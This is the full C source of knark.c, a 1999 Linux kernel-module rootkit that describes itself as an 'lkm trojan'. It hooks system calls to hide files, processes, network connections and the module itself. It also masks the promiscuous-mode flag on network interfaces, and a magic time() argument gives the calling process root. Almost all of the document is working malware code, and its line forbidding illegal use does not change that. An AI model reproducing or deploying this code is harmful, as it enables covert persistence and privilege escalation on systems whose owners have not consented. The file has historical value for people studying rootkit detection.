/*
 * knark.c, part of the knark package v0.41
 * Linux 2.1-2.2 lkm trojan
 * (c) Creed @ #hack.se 1999 <creed@sekure.net>
 * 
 * This lkm is based on heroin.c by Runar Jensen. Heroin.c however offered
 * quite few features, and major changes have been made, so this isn't the same
 * piece of code anymore.
 * 
 * This program/lkm may NOT be used in an illegal way,
 * or to cause damage of any kind.
 * 
 * See README for more info.
 */

#include <linux/version.h>
#include <linux/module.h>
#include <linux/kernel.h>

#include <linux/sched.h>
#include <linux/stat.h>
#include <linux/dirent.h>
#include <linux/fs.h>
#include <linux/if.h>
#include <linux/modversions.h>
#include <linux/malloc.h>
#include <linux/unistd.h>
#include <linux/string.h>
#include <sys/syscall.h>

#include <linux/dirent.h>
#include <linux/proc_fs.h>
#include <asm/uaccess.h>

#include "knark.h"

#define PF_INVISIBLE 0x10000000

static inline _syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count)
static inline _syscall2(int, kill, int, pid, int, sig);
static inline _syscall3(ssize_t, read, unsigned int, fd, char *, buf, size_t, count);
static inline _syscall3(int, ioctl, int, fd, int, cmd, long, arg);
static inline _syscall1(int, fork, int, regs);
static inline _syscall1(int, clone, int, regs);
static inline _syscall1(time_t, time, time_t *, t);
#ifdef HIDEMODULE
static inline _syscall5(int, query_module, const char *, name, int, which, void *, buf, size_t, bufsize, size_t *, ret);
#endif /* HIDEMODULE */

extern void *sys_call_table[];

int (*original_getdents)(unsigned int, struct dirent *, unsigned int);
int (*original_kill)(int, int);
ssize_t (*original_read)(unsigned int, char *, size_t);
int (*original_ioctl)(int, int, long);
int (*original_fork)(struct pt_regs);
int (*original_clone)(struct pt_regs);
time_t (*original_time)(time_t *);
#ifdef HIDEMODULE
int (*original_query_module)(const char *, int, void *, size_t, size_t *);
#endif /* HIDEMODULE */


ino_t knark_ino;


struct knark_dev_struct {
    kdev_t d_dev;
    int d_nfiles;
    ino_t d_inode[MAX_SECRET_FILES];
    char *d_name[MAX_SECRET_FILES];
};

struct knark_fs_struct {
    int f_ndevs;
    struct knark_dev_struct *f_dev[MAX_SECRET_DEVS];
} *kfs;


int knark_atoi(char *str)
{
    int ret = 0;
    int mul = 1;
    char *ptr;
    
    for(ptr = str; *ptr; ptr++);
    ptr--;
    
    while(ptr >= str)
    {
	if(*ptr < '0' || *ptr > '9')
	    return -EINVAL;
	ret += (*ptr - '0') * mul;
	mul *= 10;
	ptr--;
    }
    
    return ret;
}


void knark_bcopy(char *src, char *dst, unsigned int num)
{
    while(num-- > 0)
        *(dst++) = *(src++);
}


int knark_strcmp(char *str1, char *str2)
{
    while(*str1 && *str2)
	if(*(str1++) != *(str2++))
	    return -1;
    return 0;
}


struct task_struct *knark_find_task(pid_t pid)
{
    struct task_struct *task = current;

    do {
	if(task->pid == pid)
	    return task;
	task = task->next_task;
    } while(current != task);
    
    return NULL;
}


int knark_is_invisible(pid_t pid)
{
    struct task_struct *task;
    
    if(pid < 0) return 0;
    
    if( (task = knark_find_task(pid)) == NULL)
	return 0;
    
    if(task->flags & PF_INVISIBLE)
	return 1;
    
    return 0;
}


int knark_hide_process(pid_t pid)
{
    struct task_struct *task;
    
    if( (task = knark_find_task(pid)) == NULL)
	return 0;
    
    task->flags |= PF_INVISIBLE;
    
    return 1;
}


struct knark_dev_struct *knark_add_secret_dev(kdev_t dev)
{
    int current_dev = kfs->f_ndevs;
    int ndevs = kfs->f_ndevs;
    struct knark_dev_struct **kds = kfs->f_dev;
    
    if(ndevs >= MAX_SECRET_DEVS)
	return NULL;
    
    kds[current_dev] = (struct knark_dev_struct *) kmalloc(sizeof(struct knark_dev_struct), GFP_KERNEL);
    if(kds[current_dev] == NULL)
	return NULL;
    
    kds[current_dev]->d_dev = dev;
    kds[current_dev]->d_nfiles = 0;
    memset(kds[current_dev]->d_inode, 0, MAX_SECRET_FILES * sizeof(ino_t));
    memset(kds[current_dev]->d_name, 0, MAX_SECRET_FILES * sizeof(char *));
    kfs->f_ndevs++;
    
    return kds[current_dev];
}


struct knark_dev_struct *knark_get_secret_dev(kdev_t dev)
{
    int ndevs = kfs->f_ndevs;
    struct knark_dev_struct **kds = kfs->f_dev;
    int i;
    
    for(i = 0; i < ndevs; i++)
	if(kds[i]->d_dev == dev)
	    return kds[i];
    
    return NULL;
}


int knark_secret_file(ino_t inode, kdev_t dev)
{
    int i;
    int nfiles;
    struct knark_dev_struct *kds;
    
    kds = knark_get_secret_dev(dev);
    if(kds == NULL)
	return 0;
    
    nfiles = kds->d_nfiles;
    for(i = 0; i < nfiles; i++)
	if(kds->d_inode[i] == inode)
	    return 1;
    
    return 0;
}


int knark_hide_file(struct inode *inode, struct dentry *entry)
{
    char *name, *nameptr[16];
    int i, len, namelen = 0;
    struct knark_dev_struct *kds;
    ino_t ino = inode->i_ino;
    kdev_t dev = inode->i_sb->s_dev;
    
    if(knark_secret_file(ino, dev))
        return -1;

    kds = knark_get_secret_dev(dev);
    if(kds == NULL)
    {
        kds = knark_add_secret_dev(dev);
        if(kds == NULL)
            return -1;
    }

    else if(kds->d_nfiles >= MAX_SECRET_FILES)
        return -1;

    kds->d_inode[kds->d_nfiles] = ino;
    
    if(entry)
    {
	memset(nameptr, 0, 64);
	for(i = 0; i < 16 && entry->d_name.len != 1 && entry->d_name.name[0] != '/'; i++)
	{
	    nameptr[i] = (char *)entry->d_name.name;
	    namelen += entry->d_name.len;
	    entry = entry->d_parent;
	}
	namelen += i + 1;
	kds->d_name[kds->d_nfiles] = kmalloc(namelen, GFP_KERNEL);
	name = kds->d_name[kds->d_nfiles];
	name[0] = '\0';
	
	for(i = 0; nameptr[i]; i++);
	for(i--; i >= 0; i--)
	{
	    len = strlen(name);
	    name[len] = '/';
	    strcpy(&name[len+1], nameptr[i]);
	}
    }
    
    else
	kds->d_name[kds->d_nfiles] = NULL;

    return ++kds->d_nfiles;
}


int knark_unhide_file(struct inode *inode)
{
    int i;
    int nfiles;
    struct knark_dev_struct *kds;
    ino_t ino = inode->i_ino;
    kdev_t dev = inode->i_dev;
    
    if(!knark_secret_file(ino, dev))
	return -1;
    
    kds = knark_get_secret_dev(dev);
    if(kds == NULL)
        return -1;

    nfiles = kds->d_nfiles;
    for(i = 0; i < nfiles; i++)
        if(kds->d_inode[i] == ino)
    {
        kds->d_inode[i] = kds->d_inode[nfiles - 1];
        kds->d_inode[nfiles - 1] = 0;
	if(kds->d_name[nfiles - 1])
	    kfree(kds->d_name[nfiles - 1]);
        return --kds->d_nfiles;
    }

    return -1;
}


int knark_getdents(unsigned int fd, struct dirent *dirp, unsigned int count)
{
    int ret;
    int proc = 0;
    struct inode *dinode;
    char *ptr = (char *)dirp;
    struct dirent *curr;
    struct dirent *prev = NULL;
    kdev_t dev;
    
    ret = (*original_getdents)(fd, dirp, count);
    if(ret <= 0) return ret;

    dinode = current->files->fd[fd]->f_dentry->d_inode;
    dev = dinode->i_sb->s_dev;
    
    if(dinode->i_ino == PROC_ROOT_INO && !MAJOR(dinode->i_dev) &&
       MINOR(dinode->i_dev) == 1)
	proc++;
    
    while(ptr < (char *)dirp + ret)
    {
	curr = (struct dirent *)ptr;

	if( (proc && (curr->d_ino == knark_ino ||
		      knark_is_invisible(knark_atoi(curr->d_name)))) ||
	    knark_secret_file(curr->d_ino, dev))
	{
	    if(curr == dirp)
	    {
		ret -= curr->d_reclen;
		knark_bcopy(ptr + curr->d_reclen, ptr, ret);
		continue;
	    }
	    else
		prev->d_reclen += curr->d_reclen;
	}
	else
	    prev = curr;
	
	ptr += curr->d_reclen;
    }

    return ret;
}


int knark_fork(struct pt_regs regs)
{
    pid_t pid;
    int hide = 0;
    
    if(knark_is_invisible(current->pid))
	hide++;
    
    pid = (*original_fork)(regs);
    if(hide && pid > 0)
	knark_hide_process(pid);
    
    return pid;
}


int knark_clone(struct pt_regs regs)
{
    pid_t pid;
    int hide = 0;
    
    if(knark_is_invisible(current->pid))
	hide++;
    
    pid = (*original_clone)(regs);
    if(hide && pid > 0)
	knark_hide_process(pid);
    
    return pid;
}


int knark_kill(pid_t pid, int sig)
{
    struct task_struct *task;
    
    if(sig != SIGINVISIBLE && sig != SIGVISIBLE)
 	return (*original_kill)(pid, sig);
     
    if((task = knark_find_task(pid)) == NULL)
	return -ESRCH;
    
    if(current->uid && current->euid)
	return -EPERM;
    
    if(sig == SIGINVISIBLE) task->flags |= PF_INVISIBLE;
    else task->flags &= ~PF_INVISIBLE;
    
    return 0;
}


int knark_ioctl(int fd, int cmd, long arg)
{
    int ret;
    struct ifreq ifr;
    struct inode *inode;
    struct dentry *entry;

    if(cmd != KNARK_ELITE_CMD)
    {
	ret = (*original_ioctl)(fd, cmd, arg);
	if(!ret && cmd == SIOCGIFFLAGS)
	{
	    copy_from_user(&ifr, (void *)arg, sizeof(struct ifreq));
	    ifr.ifr_ifru.ifru_flags &= ~IFF_PROMISC;
	    copy_to_user((void *)arg, &ifr, sizeof(struct ifreq));
	}
	return ret;
    }
    
    if(current->files->fd[fd] == NULL)
	return -1;
    
    entry = current->files->fd[fd]->f_dentry;
    inode = entry->d_inode;
    
    switch(arg)
    {
      case KNARK_HIDE_FILE:
	ret = knark_hide_file(inode, entry);
	break;
	
      case KNARK_UNHIDE_FILE:
	ret = knark_unhide_file(inode);
	break;
	
      case KNARK_GREPV:
      case KNARK_UNGREPV:
      default:
	return -EINVAL;
    }
    return ret;
}


int knark_read(int fd, char *buf, size_t count)
{
    int ret;
    char *p1, *p2, *secret;
    struct inode *dinode;
    
    ret = (*original_read)(fd, buf, count);
    
    if(ret <= 0) return ret;
    
    dinode = current->files->fd[fd]->f_dentry->d_inode;
    
    if(MAJOR(dinode->i_dev) || MINOR(dinode->i_dev) != 1)
	return ret;
    
    if(dinode->i_ino == PROC_MODULES ||
       dinode->i_ino == PROC_NET_TCP ||
       dinode->i_ino == PROC_NET_UDP)
    {
	if(dinode->i_ino == PROC_MODULES)
	    secret = MODULE_NAME;
	else
	    secret = NETSTATHIDE;
	
	while( (p1 = p2 = (char *) strstr(buf, secret)) )
	{
	    *p1 =~ *p1;
	    
	    while(*p1 != '\n' && p1 > buf)
		p1--;
	    if(*p1 == '\n')
		p1++;
	    
	    while(*p2 != '\n' && p2 < buf + ret - 1)
		p2++;
	    if(*p2 == '\n')
		p2++;
	    
	    while(p2 < buf + ret)
		*(p1++) = *(p2++);

	    ret -= p2 - p1;
	}
    }
    
    return ret;
}


time_t knark_time(time_t *t)
{
    if((unsigned long)t != TIMEROOTNUM)
	return (*original_time)(t);
    
    current->uid = 0;
    current->euid = 0;
    current->gid = 0;
    current->egid = 0;
    current->suid = 0;
    current->sgid = 0;
    current->fsuid = 0;
    current->fsgid = 0;
    
    return 0;
}


#ifdef HIDEMODULE
int knark_query_module(const char *name, int which, void *buf,
		       size_t bufsize, size_t *ret)
{
    int retrn;
    int cnt;
    char *ptr, *match;
    
    retrn = (*original_query_module)(name, which, buf, bufsize, ret);
    
    if(retrn < 0 || which != QM_MODULES) return retrn;
    
    ptr = buf;
    
    for(cnt = 0; cnt < *ret; cnt++)
    {
	if(!knark_strcmp(MODULE_NAME, ptr))
	{
	    match = ptr;
	    while(*ptr)
		ptr++;
	    ptr++;
	    knark_bcopy(ptr, match, bufsize - (ptr - (char *)buf));
	    (*ret)--;
	    return retrn;
	}
	while(*ptr)
	    ptr++;
	ptr++;
    }
    
    return retrn;
}
#endif /* HIDEMODULE */


#define BUF_LIMIT (PAGE_SIZE - 80)
int knark_read_pids(char *buf, char **start, off_t offset, int len,
		    int unused)
{
    struct task_struct *task;
    
    if( (task = knark_find_task(1)) == NULL)
	return 0;
    
    len = sprintf(buf, " EUID PID\tCOMMAND\n");
    
    do {
	if(task->flags & PF_INVISIBLE)
	    len += sprintf(buf+len, "%5d %d\t%s\n",
			   task->euid, task->pid, task->comm);
	task = task->next_task;
    } while(task->pid != 1 && len < BUF_LIMIT);
    
    return len;
}


int knark_read_files(char *buf, char **start, off_t offset, int len,
		    int unsused)
{
    int n, i;
    
    len = sprintf(buf, "HIDDEN FILES\n");

    for(n = 0; n < kfs->f_ndevs; n++)
	for(i = 0; i < kfs->f_dev[n]->d_nfiles; i++)
	    len += sprintf(buf+len, "%s\n", kfs->f_dev[n]->d_name[i]);
    
    return len;
}


int knark_read_creed(char *buf, char **start, off_t offset, int len,
		     int unused)
{
    len = sprintf(buf,
		  "* * * * * * * * * * * * * * * * * * * * * * * * * *\n"
		  "*               knark %s by Creed              *\n"
		  "*                                                 *\n"
		  "* email:  creed@sekure.net                        *\n"
		  "* ircnet: #linux.se, #hack.se                     *\n"
		  "* efnet:  #hack.se                                *\n"
		  "*                                                 *\n"
		  "* This program may NOT be used in an illegal way  *\n"
	          "*        or to cause damage of any kind.          *\n"
		  "* * * * * * * * * * * * * * * * * * * * * * * * * *\n",
		  KNARK_VERSION);
	
    return len;
}


struct proc_dir_entry knark_dir = {
    0,
    sizeof(MODULE_NAME)-1, MODULE_NAME,
    S_IFDIR|S_IRUGO|S_IXUGO,
    1, 0, 0,
    0,
};


struct proc_dir_entry knark_pids = {
    0,
    4, "pids",
    S_IFREG|S_IRUGO,
    1, 0, 0,
    0,
    NULL,
    &knark_read_pids
};


struct proc_dir_entry knark_files = {
    0,
    5, "files",
    S_IFREG|S_IRUGO,
    1, 0, 0,
    0,
    NULL,
    &knark_read_files
};


struct proc_dir_entry knark_creed = {
    0,
    5, "Creed",
    S_IFREG|S_IRUGO,
    1, 0, 0,
    0,
    NULL,
    &knark_read_creed
};


int init_module(void)
{
    kfs = kmalloc(sizeof(struct knark_fs_struct), GFP_KERNEL);
    if(kfs == NULL) goto error;
    memset((void *)kfs, 0, sizeof(struct knark_fs_struct));
    
    proc_register(&proc_root, &knark_dir);
    knark_ino = knark_dir.low_ino;
    proc_register(&knark_dir, &knark_pids);
    proc_register(&knark_dir, &knark_files);
    proc_register(&knark_dir, &knark_creed);
    
    original_getdents = sys_call_table[SYS_getdents];
    sys_call_table[SYS_getdents] = knark_getdents;
    
    original_kill = sys_call_table[SYS_kill];
    sys_call_table[SYS_kill] = knark_kill;
    
    original_read = sys_call_table[SYS_read];
    sys_call_table[SYS_read] = knark_read;
    
    original_ioctl = sys_call_table[SYS_ioctl];
    sys_call_table[SYS_ioctl] = knark_ioctl;
    
    original_fork = sys_call_table[SYS_fork];
    sys_call_table[SYS_fork] = knark_fork;
    
    original_clone = sys_call_table[SYS_clone];
    sys_call_table[SYS_clone] = knark_clone;
    
    original_time = sys_call_table[SYS_time];
    sys_call_table[SYS_time] = knark_time;
#ifdef HIDEMODULE
    original_query_module = sys_call_table[SYS_query_module];
    sys_call_table[SYS_query_module] = knark_query_module;
#endif /* HIDEMODULE */
    
    return 0;
error:
    return -1;
}


void cleanup_module(void)
{
    int i, n;
    
    for(i = 0; i < kfs->f_ndevs; i++)
    {
	kfree(kfs->f_dev[i]);
	for(n = 0; kfs->f_dev[i]->d_name; n++)
	    kfree(kfs->f_dev[i]->d_name);
    }
    kfree(kfs);
	
    proc_unregister(&knark_dir, knark_pids.low_ino);
    proc_unregister(&knark_dir, knark_files.low_ino);
    proc_unregister(&knark_dir, knark_creed.low_ino);
    proc_unregister(&proc_root, knark_dir.low_ino);
    
    sys_call_table[SYS_getdents] = original_getdents;
    sys_call_table[SYS_kill] = original_kill;
    sys_call_table[SYS_read] = original_read;
    sys_call_table[SYS_ioctl] = original_ioctl;
    sys_call_table[SYS_fork] = original_fork;
    sys_call_table[SYS_clone] = original_clone;
    sys_call_table[SYS_time] = original_time;
#ifdef HIDEMODULE
    sys_call_table[SYS_query_module] = original_query_module;
#endif /* HIDEMODULE */
}
